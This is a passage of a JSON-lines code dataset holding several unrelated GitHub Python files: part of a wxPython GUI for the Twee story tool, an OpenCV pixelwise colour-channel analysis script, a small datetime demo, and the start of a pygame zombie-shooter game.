wx.ICON_ERROR)\n\t\t\treturn\n\t\t\t\t\n\t\tself.dirty = False\n\t\t\n\t\t# sync UI to file contents\n\t\t\t\t\t\t\n\t\tself.updateTitle()\n\t\tself.updateDestination()\n\t\tself.sourcesList.Clear()\n\t\t\n\t\tfor source in self.project.sources:\n\t\t\tself.sourcesList.Append(os.path.basename(source))\n\t\t\n\t\ttarget = self.targetToReadable(self.project.target)\n\t\tself.targetChoice.SetStringSelection(target)\t\t\n\n\n\tdef displayError (self, activity):\n\t\texception = sys.exc_info()\n\t\ttext = 'An error occurred while ' + activity + ' ('\n\t\ttext += str(exception[1]) + ').'\n\t\t\n\t\terror = wx.MessageDialog(self, text, 'Error', wx.OK | wx.ICON_ERROR)\n\t\terror.ShowModal()\n\t\t\n\n\tdef onSaveAs (self, event):\n\t\tdialog = wx.FileDialog(self, 'Save Project', os.getcwd(), \"\", \\\n\t\t\t\t\t\t\t \"Tweebox Project (*.twp)|*.twp\", \\\n\t\t \t\t\t\t\t wx.SAVE | wx.FD_OVERWRITE_PROMPT | wx.FD_CHANGE_DIR)\n\t\t\n\t\tif dialog.ShowModal() == wx.ID_OK:\n\t\t\tself.fileName = dialog.GetPath()\n\t\t\tself.updateTitle()\n\t\t\tself.onSave(event)\n\t\t\t\n\t\tdialog.Destroy()\n\t\t\t\n\n\tdef onSave (self, event):\n\t\tif self.fileName != '':\n\t\t\ttry:\n\t\t\t\tself.project.save(self.fileName)\n\t\t\t\tself.dirty = False\n\t\t\texcept:\n\t\t\t\tself.displayError('saving your project')\n\t\telse:\n\t\t\tself.onSaveAs(event)\n\n\n\tdef onQuit (self, event):\n\t\tif self.closeProject():\n\t\t\tself.recentFiles.Save(self.config)\n\t\t\tself.Close(True)\n\t\t\n\n\tdef onAddSource (self, event):\n\t\tdialog = wx.FileDialog(self, 'Add Source File', os.getcwd(), \"\", \\\n\t\t\t\t\t\t\t \"Twee source code (*.tw)|*.tw|Plain text files (*.txt)|*.txt\", wx.OPEN | wx.FD_CHANGE_DIR)\n\t\t\n\t\tif dialog.ShowModal() == wx.ID_OK:\n\t\t\tpath = dialog.GetPath()\n\t\t\tself.project.sources.append(path)\n\t\t\tself.sourcesList.Append(os.path.basename(path))\n\t\t\tself.dirty = True\n\t\t\t\n\t\tdialog.Destroy()\n\n\n\tdef onRemoveSource (self, event):\n\t\tindex = self.sourcesList.GetSelection()\n\t\tself.project.sources.pop(index)\n\t\tself.sourcesList.Delete(index)\n\t\tself.dirty = True\n\t\t\n\t\t\n\tdef onChangeTarget (self, event):\n\t\ttarget = self.targetChoice.GetStringSelection()\n\t\tself.project.target = self.readableToTarget(target)\n\t\tself.dirty = True\n\t\t\n\n\tdef onSetDestination (self, event):\n\t\tdialog = wx.FileDialog(self, 'Save Story As', os.getcwd(), \"\", \\\n\t \t\t\t\t\t\t \"Web Page (*.html)|*.html\", \\\n\t\t\t\t\t\t\t wx.SAVE | wx.FD_OVERWRITE_PROMPT | wx.FD_CHANGE_DIR)\n\t\t\n\t\tif dialog.ShowModal() == wx.ID_OK:\n\t\t\tpath = dialog.GetPath()\n\t\t\tself.project.destination = path\n\t\t\tself.dirty = True\n\t\t\tself.updateDestination()\n\t\t\tdialog.Destroy()\n\t\t\treturn True\n\t\t\t\n\t\tdialog.Destroy()\n\t\treturn False\t\t\n\n\t\t\t\t\n\tdef onBuild (self, event):\t\n\t\tif self.project.destination == '':\n\t\t\tif not self.onSetDestination(event):\n\t\t\t\treturn\n\t\t\t\t\n\t\tself.SetStatusText('Building your story...')\n\t\n\t\ttry:\n\t\t\tif self.project.build():\n\t\t\t\tpath = 'file://' + urllib.pathname2url(self.project.destination)\n\t\t\t\tpath = path.replace('file://///', 'file:///')\n\t\t\t\twx.LaunchDefaultBrowser(path)\t\n\t\t\t\tself.SetStatusText('Your story has been successfully built.')\n\t\texcept:\n\t\t\t self.displayError('building your story')\n\t\t\t self.SetStatusText('')\n\n\tdef onProof (self, event):\t\n\t\tif self.project.destination == '':\n\t\t\tif not self.onSetDestination(event):\n\t\t\t\treturn\n\t\t\t\t\n\t\tself.SetStatusText('Building proofing copy...')\n\t\n\t\ttry:\n\t\t\tif self.project.proof():\t\n\t\t\t\tself.SetStatusText('Your proofing copy has been successfully built.')\n\t\texcept:\n\t\t\t self.displayError('building a proofing copy of your story')\n\t\t\t self.SetStatusText('')", "repo_name": "factorypreset/twee", "sub_path": "twee/branches/1.5/lib/gui.py", "file_name": "gui.py", "file_ext": "py", "file_size_in_byte": 12936, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "53", "api": [{"api_name": "wx.Frame", "line_number": 30, "usage_type": "attribute"}, {"api_name": "wx.Config", "line_number": 40, "usage_type": "call"}, {"api_name": "wx.FileHistory", "line_number": 41, "usage_type": "call"}, {"api_name": "project.Project", "line_number": 46, "usage_type": "call"}, {"api_name": "wx.Frame.__init__", "line_number": 52, "usage_type": "call"}, {"api_name": "wx.Frame", "line_number": 52, "usage_type": "attribute"}, {"api_name": "wx.ID_ANY", "line_number": 52, "usage_type": "attribute"}, {"api_name": "wx.CLOSE_BOX", "line_number": 53, "usage_type": "attribute"}, {"api_name": "wx.CAPTION", "line_number": 53, "usage_type": "attribute"}, {"api_name": "wx.SYSTEM_MENU", "line_number": 53, "usage_type": "attribute"}, {"api_name": "wx.MINIMIZE_BOX", "line_number": 53, "usage_type": "attribute"}, {"api_name": "wx.Menu", "line_number": 74, "usage_type": "call"}, {"api_name": "wx.ID_ABOUT", "line_number": 75, "usage_type": "attribute"}, {"api_name": "wx.Menu", "line_number": 79, "usage_type": "call"}, {"api_name": "wx.ID_EXIT", "line_number": 86, "usage_type": "attribute"}, {"api_name": "wx.Menu", "line_number": 90, "usage_type": "call"}, {"api_name": "wx.MenuBar", "line_number": 99, "usage_type": "call"}, {"api_name": "wx.EVT_UPDATE_UI", "line_number": 107, "usage_type": "call"}, {"api_name": "wx.EVT_MENU", "line_number": 109, "usage_type": "call"}, {"api_name": "wx.ID_ABOUT", "line_number": 109, "usage_type": "attribute"}, {"api_name": "wx.EVT_MENU", "line_number": 110, "usage_type": "call"}, {"api_name": "wx.EVT_MENU", "line_number": 111, "usage_type": "call"}, {"api_name": "wx.EVT_MENU", "line_number": 112, "usage_type": "call"}, {"api_name": "wx.EVT_MENU", "line_number": 113, "usage_type": "call"}, {"api_name": "wx.EVT_MENU", "line_number": 114, "usage_type": "call"}, {"api_name": "wx.EVT_MENU", "line_number": 115, "usage_type": "call"}, {"api_name": "wx.EVT_MENU", "line_number": 116, "usage_type": "call"}, {"api_name": "wx.ID_EXIT", "line_number": 116, "usage_type": "attribute"}, {"api_name": "wx.EVT_MENU", "line_number": 117, "usage_type": "call"}, {"api_name": "wx.ID_FILE1", "line_number": 117, "usage_type": "attribute"}, {"api_name": "wx.EVT_MENU", "line_number": 118, "usage_type": "call"}, {"api_name": "wx.ID_FILE2", "line_number": 118, "usage_type": "attribute"}, {"api_name": "wx.EVT_MENU", "line_number": 119, "usage_type": "call"}, {"api_name": "wx.ID_FILE3", "line_number": 119, "usage_type": "attribute"}, {"api_name": "wx.EVT_MENU", "line_number": 120, "usage_type": "call"}, {"api_name": "wx.ID_FILE4", "line_number": 120, "usage_type": "attribute"}, {"api_name": "wx.EVT_MENU", "line_number": 121, "usage_type": "call"}, {"api_name": "wx.ID_FILE5", "line_number": 121, "usage_type": "attribute"}, {"api_name": "wx.EVT_MENU", "line_number": 122, "usage_type": "call"}, {"api_name": "wx.EVT_MENU", "line_number": 123, "usage_type": "call"}, {"api_name": "wx.EVT_MENU", "line_number": 124, "usage_type": "call"}, {"api_name": "wx.EVT_MENU", "line_number": 125, "usage_type": "call"}, {"api_name": "wx.Panel", "line_number": 129, "usage_type": "call"}, {"api_name": "wx.BoxSizer", "line_number": 130, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 130, "usage_type": "attribute"}, {"api_name": "wx.Panel", "line_number": 135, "usage_type": "call"}, {"api_name": "wx.StaticBox", "line_number": 136, "usage_type": "call"}, {"api_name": "wx.ID_ANY", "line_number": 136, "usage_type": "attribute"}, {"api_name": "wx.StaticBoxSizer", "line_number": 137, "usage_type": "call"}, {"api_name": "wx.VERTICAL", "line_number": 137, "usage_type": "attribute"}, {"api_name": "wx.ListBox", "line_number": 140, "usage_type": "call"}, {"api_name": "wx.Button", "line_number": 141, "usage_type": "call"}, {"api_name": "wx.EVT_BUTTON", "line_number": 142, "usage_type": "call"}, {"api_name": "wx.EXPAND", "line_number": 144, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 145, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_RIGHT", "line_number": 145, "usage_type": "attribute"}, {"api_name": "wx.Panel", "line_number": 149, "usage_type": "call"}, {"api_name": "wx.StaticBox", "line_number": 150, "usage_type": "call"}, {"api_name": "wx.ID_ANY", "line_number": 150, "usage_type": "attribute"}, {"api_name": "wx.StaticBoxSizer", "line_number": 151, "usage_type": "call"}, {"api_name": "wx.VERTICAL", "line_number": 151, "usage_type": "attribute"}, {"api_name": "wx.Panel", "line_number": 156, "usage_type": "call"}, {"api_name": "wx.BoxSizer", "line_number": 157, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 157, "usage_type": "attribute"}, {"api_name": "wx.StaticText", "line_number": 160, "usage_type": "call"}, {"api_name": "wx.ID_ANY", "line_number": 160, "usage_type": "attribute"}, {"api_name": "wx.Button", "line_number": 161, "usage_type": "call"}, {"api_name": "wx.EVT_BUTTON", "line_number": 162, "usage_type": "call"}, {"api_name": "wx.TOP", "line_number": 164, "usage_type": "attribute"}, {"api_name": "wx.BOTTOM", "line_number": 164, "usage_type": "attribute"}, {"api_name": "wx.EXPAND", "line_number": 164, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 165, "usage_type": "attribute"}, {"api_name": "wx.BOTTOM", "line_number": 165, "usage_type": "attribute"}, {"api_name": "wx.EXPAND", "line_number": 167, "usage_type": "attribute"}, {"api_name": "wx.Panel", "line_number": 171, "usage_type": "call"}, {"api_name": "wx.BoxSizer", "line_number": 172, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 172, "usage_type": "attribute"}, {"api_name": "wx.StaticText", "line_number": 175, "usage_type": "call"}, {"api_name": "wx.ID_ANY", "line_number": 175, "usage_type": "attribute"}, {"api_name": "wx.Choice", "line_number": 177, "usage_type": "call"}, {"api_name": "wx.EVT_CHOICE", "line_number": 181, "usage_type": "call"}, {"api_name": "wx.TOP", "line_number": 183, "usage_type": "attribute"}, {"api_name": "wx.BOTTOM", "line_number": 183, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 184, "usage_type": "attribute"}, {"api_name": "wx.BOTTOM", "line_number": 184, "usage_type": "attribute"}, {"api_name": "wx.ALL", "line_number": 186, "usage_type": "attribute"}, {"api_name": "wx.EXPAND", "line_number": 186, "usage_type": "attribute"}, {"api_name": "wx.ALL", "line_number": 190, "usage_type": "attribute"}, {"api_name": "wx.EXPAND", "line_number": 190, "usage_type": "attribute"}, {"api_name": "wx.ALL", "line_number": 191, "usage_type": "attribute"}, {"api_name": "wx.EXPAND", "line_number": 191, "usage_type": "attribute"}, {"api_name": "wx.NOT_FOUND", "line_number": 198, "usage_type": "attribute"}, {"api_name": "os.path.splitext", "line_number": 215, "usage_type": "call"}, {"api_name": "os.path", "line_number": 215, "usage_type": "attribute"}, {"api_name": "os.path.basename", "line_number": 216, "usage_type": "call"}, {"api_name": "os.path", "line_number": 216, "usage_type": "attribute"}, {"api_name": "os.path.basename", "line_number": 225, "usage_type": "call"}, {"api_name": "os.path", "line_number": 225, "usage_type": "attribute"}, {"api_name": "os.path.splitext", "line_number": 232, "usage_type": "call"}, {"api_name": "os.path", "line_number": 232, "usage_type": "attribute"}, {"api_name": "os.path.basename", "line_number": 233, "usage_type": "call"}, {"api_name": "os.path", "line_number": 233, "usage_type": "attribute"}, {"api_name": "wx.MessageDialog", "line_number": 236, "usage_type": "call"}, {"api_name": "wx.ICON_QUESTION", "line_number": 237, "usage_type": "attribute"}, {"api_name": "wx.YES_NO", "line_number": 237, "usage_type": "attribute"}, {"api_name": "wx.NO_DEFAULT", "line_number": 237, "usage_type": "attribute"}, {"api_name": "wx.ID_YES", "line_number": 238, "usage_type": "attribute"}, {"api_name": "wx.AboutDialogInfo", "line_number": 275, "usage_type": "call"}, {"api_name": "wx.AboutBox", "line_number": 280, "usage_type": "call"}, {"api_name": "wx.LaunchDefaultBrowser", "line_number": 284, "usage_type": "call"}, {"api_name": "wx.LaunchDefaultBrowser", "line_number": 288, "usage_type": "call"}, {"api_name": "project.Project", "line_number": 293, "usage_type": "call"}, {"api_name": "wx.FileDialog", "line_number": 303, "usage_type": "call"}, {"api_name": "os.getcwd", "line_number": 303, "usage_type": "call"}, {"api_name": "wx.OPEN", "line_number": 305, "usage_type": "attribute"}, {"api_name": "wx.FD_CHANGE_DIR", "line_number": 305, "usage_type": "attribute"}, {"api_name": "wx.ID_OK", "line_number": 307, "usage_type": "attribute"}, {"api_name": "wx.ID_FILE1", "line_number": 315, "usage_type": "attribute"}, {"api_name": "wx.ID_FILE2", "line_number": 317, "usage_type": "attribute"}, {"api_name": "wx.ID_FILE3", "line_number": 319, "usage_type": "attribute"}, {"api_name": "wx.ID_FILE4", "line_number": 321, "usage_type": "attribute"}, {"api_name": "wx.ID_FILE5", "line_number": 323, "usage_type": "attribute"}, {"api_name": "project.Project", "line_number": 331, "usage_type": "call"}, {"api_name": "wx.MessageBox", "line_number": 334, "usage_type": "call"}, {"api_name": "wx.ICON_ERROR", "line_number": 336, "usage_type": "attribute"}, {"api_name": "os.path.basename", "line_number": 348, "usage_type": "call"}, {"api_name": "os.path", "line_number": 348, "usage_type": "attribute"}, {"api_name": "sys.exc_info", "line_number": 355, "usage_type": "call"}, {"api_name": "wx.MessageDialog", "line_number": 359, "usage_type": "call"}, {"api_name": "wx.OK", "line_number": 359, "usage_type": "attribute"}, {"api_name": "wx.ICON_ERROR", "line_number": 359, "usage_type": "attribute"}, {"api_name": "wx.FileDialog", "line_number": 364, "usage_type": "call"}, {"api_name": "os.getcwd", "line_number": 364, "usage_type": "call"}, {"api_name": "wx.SAVE", "line_number": 366, "usage_type": "attribute"}, {"api_name": "wx.FD_OVERWRITE_PROMPT", "line_number": 366, "usage_type": "attribute"}, {"api_name": "wx.FD_CHANGE_DIR", "line_number": 366, "usage_type": "attribute"}, {"api_name": "wx.ID_OK", "line_number": 368, "usage_type": "attribute"}, {"api_name": "wx.FileDialog", "line_number": 394, "usage_type": "call"}, {"api_name": "os.getcwd", "line_number": 394, "usage_type": "call"}, {"api_name": "wx.OPEN", "line_number": 395, "usage_type": "attribute"}, {"api_name": "wx.FD_CHANGE_DIR", "line_number": 395, "usage_type": "attribute"}, {"api_name": "wx.ID_OK", "line_number": 397, "usage_type": "attribute"}, {"api_name": "os.path.basename", "line_number": 400, "usage_type": "call"}, {"api_name": "os.path", "line_number": 400, "usage_type": "attribute"}, {"api_name": "wx.FileDialog", "line_number": 420, "usage_type": "call"}, {"api_name": "os.getcwd", "line_number": 420, "usage_type": "call"}, {"api_name": "wx.SAVE", "line_number": 422, "usage_type": "attribute"}, {"api_name": "wx.FD_OVERWRITE_PROMPT", "line_number": 422, "usage_type": "attribute"}, {"api_name": "wx.FD_CHANGE_DIR", "line_number": 422, "usage_type": "attribute"}, {"api_name": "wx.ID_OK", "line_number": 424, "usage_type": "attribute"}, {"api_name": "urllib.pathname2url", "line_number": 445, "usage_type": "call"}, {"api_name": "wx.LaunchDefaultBrowser", "line_number": 447, "usage_type": "call"}]} +{"seq_id": "34184206592", "text": "import cv2\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pickle\nfrom tqdm import tqdm\n\nclass channel_visualizer():\n def __init__(self, input_video_path, outpath, colorspace = 'ycrbr', win_size=60, plot_W = 640, plot_H = 480):\n self.win_size = win_size\n self.plot_W = plot_W\n self.plot_H = plot_H\n \n try:\n self.input_capture = cv2.VideoCapture(input_video_path)\n except:\n raise ValueError('Input video path %s not valid' % input_video_path)\n \n if self.input_capture is not None: \n self.tot_input_vid_frames = int(self.input_capture.get(cv2.CAP_PROP_FRAME_COUNT)) \n self.input_cap_fps = int(self.input_capture.get(cv2.CAP_PROP_FPS))\n self.W , self.H = int(self.input_capture.get(3)), int(self.input_capture.get(4)) #input video dimensions\n else:\n raise ValueError(\"Invalid input video\")\n \n self.chan1 = []\n self.chan2 = []\n self.chan3 = []\n\n self.chan12 = []\n self.chan13 = []\n self.chan23 = []\n\n self.num_pixels = self.W * self.H\n for i in range(self.num_pixels):\n self.chan1.append([])\n self.chan2.append([])\n self.chan3.append([])\n self.chan12.append([])\n self.chan23.append([])\n self.chan13.append([])\n\n self.colorspace = colorspace\n if colorspace == 'ycrbr':\n self.chan1_name = 'Y'\n self.chan2_name = 'Cr'\n self.chan3_name = 'Br'\n print('YCrBr analysis')\n elif colorspace == 'bgr':\n self.chan1_name = 'B'\n self.chan2_name = 'G'\n self.chan3_name = 'R'\n\n self.frame_num = 0\n\n self.outpath = outpath\n self.input_vid_name = 'mp_' + input_video_path.split('/')[-1][:-4]\n \n \n def run(self):\n \"\"\"\n process the input video!\n \"\"\"\n\n #generate data\n with tqdm(total=self.tot_input_vid_frames) as pbar:\n pbar.set_description('Generating color channel visualization data')\n while self.input_capture.isOpened():\n ret, frame = self.input_capture.read()\n if ret:\n self.frame_num += 1\n if self.chan1_name == 'Y':\n frame = cv2.cvtColor(frame, cv2.COLOR_BGR2YCR_CB)\n for i in range(self.num_pixels):\n r = int(i / self.W)\n c = i % self.W\n self.chan1[i].append(frame[r, c, 0])\n self.chan2[i].append(frame[r, c, 1])\n self.chan3[i].append(frame[r, c, 2])\n self.chan12[i].append(frame[r, c, 0] / frame[r, c, 1])\n self.chan13[i].append(frame[r, c, 0] / frame[r, c, 2])\n self.chan23[i].append(frame[r, c, 1] / frame[r, c, 2])\n else:\n break\n pbar.update(1)\n for i in range(900):\n print(self.chan1[i][10])\n #save all data\n with open(f'{self.outpath}/{self.colorspace}_{self.input_vid_name}_pixelwise_channel_data.pkl','wb') as f:\n data_dict = {\n 'chan1':self.chan1, \n 'chan2':self.chan2, \n 'chan3':self.chan3, \n 'chan12':self.chan12,\n 'chan13':self.chan13,\n 'chan23':self.chan23,\n }\n pickle.dump(data_dict, f)\n\n ", "repo_name": "Hadleigh-Schwartz/deepfake_detection", "sub_path": "evm_experiments/vis_channels_pixelwise.py", "file_name": "vis_channels_pixelwise.py", "file_ext": "py", "file_size_in_byte": 3551, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "cv2.VideoCapture", "line_number": 14, "usage_type": "call"}, {"api_name": "cv2.CAP_PROP_FRAME_COUNT", "line_number": 19, "usage_type": "attribute"}, {"api_name": "cv2.CAP_PROP_FPS", "line_number": 20, "usage_type": "attribute"}, {"api_name": "tqdm.tqdm", "line_number": 65, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 72, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2YCR_CB", "line_number": 72, "usage_type": "attribute"}, {"api_name": "pickle.dump", "line_number": 97, "usage_type": "call"}]} +{"seq_id": "6654316188", "text": "# importing datetime module\n\nimport datetime\nimport time\nfrom datetime import timedelta\n\n#### display the current time in UNIX format\n\n# assigned regular string date\ndate_time = datetime.datetime(2023, 1, 26, 15, 20)\n \n # print regular python date&time\nprint(\"date_time =>\",date_time)\n\n \n# displaying unix timestamp after conversion\nprint(\"unix_timestamp => \",\n (time.mktime(date_time.timetuple())))\n\n#######\n####### calculate the time from today until a given date, outputs the delta\ntime_now = datetime.datetime.now()\npast_date1 = time_now - timedelta(days=189)\nprint(past_date1) \n\n# What day will it be after 180 days\nfuture_date2 = time_now + timedelta(days=189)\nprint(future_date2)\n\n# What day would it have been 150 days ago\npast_date1 = time_now - timedelta(days=189)\nprint(past_date1)\n\n\n\n", "repo_name": "mathiasgrosse/Best_GroupDCI", "sub_path": "unixformat.py", "file_name": "unixformat.py", "file_ext": "py", "file_size_in_byte": 802, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "datetime.datetime", "line_number": 10, "usage_type": "call"}, {"api_name": "time.mktime", "line_number": 18, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 22, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 22, "usage_type": "attribute"}, {"api_name": "datetime.timedelta", "line_number": 23, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 27, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 31, "usage_type": "call"}]} +{"seq_id": "35044616496", "text": "import pygame, sys\nfrom pygame import mixer\nimport random\nimport math\n\npygame.init()\nmixer.init()\npygame.font.init()\n\n# CONSTANTS\nSCREEN_WIDTH = 1000\nSCREEN_HEIGHT = (int)(SCREEN_WIDTH * 0.8)\nBG = (105, 105, 105)\nBG_IMAGE = pygame.image.load('misc/bg_image.jpg')\nWHITE = (255, 255, 255)\nRED = (255, 0, 0)\nFPS = 60\n\n#ICON\nprogramIcon = pygame.image.load('misc/icon.png')\npygame.display.set_icon(programIcon)\n\noriginal_wizard1image = pygame.image.load('good/wizard1.png')\noriginal_wizard2image = pygame.image.load('good/wizard2.png')\noriginal_zombieimage = pygame.image.load('bad/zombie.png')\n\n# MUSIC CONSTANTS\nmain_menu_music = pygame.mixer.Sound('music/main_menu.mp3')\nmain_menu_music.set_volume(1)\n# funny_bit, retro_platforming, castle_of_fear\nmusic = pygame.mixer.Sound('music/funny_bit.mp3')\nmusic.set_volume(0.7)\nlaser_sfx = pygame.mixer.Sound('music/lasersfx.wav')\nlaser_sfx.set_volume(0.5)\n\n# FONT CONSTANTS\nfont_score = pygame.font.Font('misc/8-bit Arcade In.ttf', 100)\nfont = pygame.font.Font('misc/8-bit Arcade In.ttf', 35)\nfont_gameover = pygame.font.Font('misc/8-bit Arcade In.ttf', 200)\n\n# DISPLAY\nscreen = pygame.display.set_mode((SCREEN_WIDTH, SCREEN_HEIGHT))\npygame.display.set_caption(\"Laser-Bound\")\n\n# DEFINE PLAYER ACTION VARIBALES\none_moving_left = False\none_moving_right = False\none_moving_up = False\none_moving_down = False\n\ntwo_moving_left = False\ntwo_moving_right = False\ntwo_moving_up = False\ntwo_moving_down = False\n\n\nclass Character(pygame.sprite.Sprite):\n def __init__(self, number, x, y, scale, speed):\n self.speed = speed\n self.scale = scale\n self.number = number\n\n image = pygame.image.load(f'good/wizard{number}.png').convert_alpha()\n self.image = pygame.transform.scale(image, (int(image.get_width() * scale), int(image.get_height() * scale)))\n self.rect = self.image.get_rect()\n self.rect.center = (x, y)\n\n def move(self, moving_left, moving_right, moving_up, moving_down):\n # promjena x i y koordinate\n dx = 0\n dy = 0\n\n if moving_left:\n if self.rect.left > 0:\n dx = -self.speed\n if moving_right:\n if self.rect.right < SCREEN_WIDTH:\n dx = self.speed\n if moving_up:\n if self.rect.top > 0:\n dy = -self.speed\n if moving_down:\n if self.rect.bottom < SCREEN_HEIGHT:\n dy = self.speed\n\n # update rectangle position\n self.rect.x += dx\n self.rect.y += dy\n\n def draw(self):\n if self.number == '1':\n main = (main1.rect.center)\n secondary = (main2.rect.center)\n else:\n main = (main2.rect.center)\n secondary = (main1.rect.center)\n ang_x, ang_y = secondary[0] - main[0], secondary[1] - main[1]\n angle = (180 / math.pi) * - math.atan2(ang_y, ang_x) - 90\n if self.number == '1':\n self.image = pygame.transform.rotozoom(original_wizard1image, int(angle), self.scale)\n screen.blit(self.image, self.rect)\n else:\n self.image = pygame.transform.rotozoom(original_wizard2image, int(angle), self.scale)\n screen.blit(self.image, self.rect)\n\n\n\nclass Zombie(pygame.sprite.Sprite):\n def __init__(self, x, y, scale, speed):\n pygame.sprite.Sprite.__init__(self, zombie_group)\n self.speed = speed\n self.check = 0\n self.num = random.choice(main)\n self.scale = scale\n\n img = pygame.image.load('bad/zombie.png').convert_alpha()\n self.image = pygame.transform.scale(img, (int(img.get_width() * scale), int(img.get_height() * scale)))\n self.rect = self.image.get_rect()\n self.rect.center = (x, y)\n\n def move(self):\n dx = self.speed\n dy = self.speed\n\n if self.rect.x > self.num.rect.x:\n self.rect.x += -dx\n else:\n self.rect.x += dx\n\n if self.rect.y > self.num.rect.y:\n self.rect.y += -dy\n else:\n self.rect.y += dy\n\n #self.check += 1\n\n # collision with player\n if self.rect.colliderect(main1) or self.rect.colliderect(main2):\n gameover()\n #pygame.display.quit()\n\n\n def draw(self):\n if self.num == main1:\n main = (self.rect.center)\n secondary = (main1.rect.center)\n else:\n main = (self.rect.center)\n secondary = (main2.rect.center)\n ang_x, ang_y = secondary[0] - main[0], secondary[1] - main[1]\n angle = (180 / math.pi) * -math.atan2(ang_y, ang_x) - 270\n self.image = pygame.transform.rotozoom(original_zombieimage, int(angle), self.scale)\n screen.blit(self.image, self.rect)\n\n\ndef draw_bg():\n screen.fill(BG)\n screen.blit(BG_IMAGE, (0, 0))\n\ndef draw_tutorial():\n wasd_blue = pygame.image.load('misc/wasd.png')\n wasd_red = pygame.image.load('misc/arrowkeys.png')\n wasd_blue = pygame.transform.scale(wasd_blue, (wasd_blue.get_width() * 0.3, wasd_blue.get_height() * 0.3))\n wasd_red = pygame.transform.scale(wasd_red, (wasd_red.get_width() * 0.3, wasd_red.get_height() * 0.3))\n screen.blit(wasd_blue, (main1.rect.centerx - 55, main1.rect.centery - 100))\n screen.blit(wasd_red, (main2.rect.centerx - 55, main2.rect.centery - 100))\n\ndef distance_point_line(pt, l1, l2):\n NV = pygame.math.Vector2(l1[1] - l2[1], l2[0] - l1[0])\n LP = pygame.math.Vector2(l1) # moze i l2\n P = pygame.math.Vector2(pt)\n return abs(\n NV.normalize().dot(P - LP)) # dot je mnozenje vektora sa skalarom. P-LP je smjer koji main1 ima prema zombie\n\ndef fade(width, height, button_play, button_exit, logo):\n fade = pygame.Surface((width, height))\n fade.fill((0, 0, 0))\n for alpha in range(300):\n fade.set_alpha(alpha)\n draw_bg()\n screen.blit(button_play, (100, 400))\n screen.blit(button_exit, (550, 400))\n screen.blit(logo, (100, 200))\n screen.blit(fade, (0,0))\n pygame.display.update()\n pygame.time.delay(1)\n\ndef gameover():\n score_text = font_gameover.render(str(getScore()), False, WHITE)\n highscore_text = font_gameover.render(str(getHighscore()), False, WHITE)\n gameover_menu = pygame.image.load(\"misc/gameover_img.png\")\n button_restart = pygame.image.load(\"ui/button_restart.png\")\n button_restart_hover = pygame.image.load(\"ui/button_restart_hover.png\")\n button_exit = pygame.image.load(\"ui/button_gameover_exit.png\")\n button_exit_hover = pygame.image.load(\"ui/button_gameover_exit_hover.png\")\n\n global click\n\n screen.blit(gameover_menu, (250, 100))\n screen.blit(score_text, (335, 365))\n screen.blit(highscore_text, (570, 365))\n\n gameover = True\n while gameover:\n mx, my = pygame.mouse.get_pos()\n\n screen.blit(button_restart, (285, 550))\n button_restart_rect = pygame.Rect(285, 550, 230, 90)\n if button_restart_rect.collidepoint((mx, my)):\n screen.blit(button_restart_hover, (285, 550))\n if click:\n for zombie in zombie_group:\n zombie.kill()\n gameover = False\n screen.blit(button_exit, (550, 550))\n button_exit_rect = pygame.Rect(550, 550, 148, 90)\n if button_exit_rect.collidepoint((mx, my)):\n screen.blit(button_exit_hover, (550, 550))\n if click:\n pygame.exit()\n sys.exit()\n click = False\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n if event.type == pygame.MOUSEBUTTONDOWN:\n if event.button == 1:\n click = True\n\n pygame.display.update()\n music.stop()\n game()\n\ndef pause():\n global one_moving_left, one_moving_right, one_moving_up, one_moving_down\n global two_moving_left, two_moving_right, two_moving_up, two_moving_down\n\n paused_img = pygame.image.load(\"misc/paused_img.png\")\n screen.blit(paused_img, (0, 0))\n\n music.set_volume(0.2)\n\n pause = True\n while pause:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_ESCAPE:\n one_moving_up = False\n one_moving_down = False\n one_moving_left = False\n one_moving_right = False\n two_moving_up = False\n two_moving_down = False\n two_moving_left = False\n two_moving_right = False\n pause = False\n pygame.display.update()\n music.set_volume(1)\n\n# GROUPS\nzombie_group = pygame.sprite.Group()\n\nscore = 0\nhighscore = 0\ndef setScore():\n global score\n score += 1\ndef getScore():\n global score\n return score\n\ndef getHighscore():\n global score, highscore\n if score > highscore:\n highscore = score\n return highscore\n\ndef setScoree():\n global score\n score = 0\n# ----------------------------------------------------- MAIN ----------------------------------------------------------\n\nclock = pygame.time.Clock()\nclick = False\nmusicB = True\n\n# Character(number, x, y, scale, speed)\nmain1 = Character('1', 400, 400, 1, 3)\nmain2 = Character('2', 600, 400, 1, 3)\nmain = [main1, main2]\n\ndef game():\n max_zombie_timer = 300\n zombie_timer = 0 # 5 sekundi jer 300/FPS = 5, FPS = 60\n score = 0\n setScoree()\n tutorial_timer = 300\n\n global one_moving_left, one_moving_right, one_moving_up, one_moving_down\n global two_moving_left, two_moving_right, two_moving_up, two_moving_down\n one_moving_up = False\n one_moving_down = False\n one_moving_left = False\n one_moving_right = False\n two_moving_up = False\n two_moving_down = False\n two_moving_left = False\n two_moving_right = False\n\n global main1, main2\n global main\n main1 = Character('1', 400, 400, 1, 3)\n main2 = Character('2', 600, 400, 1, 3)\n main = [main1, main2]\n\n first_time = True\n\n main_menu_music.stop()\n music.play(-1, 0, 0)\n\n run = True\n while run:\n clock.tick(FPS)\n draw_bg()\n\n if first_time:\n if 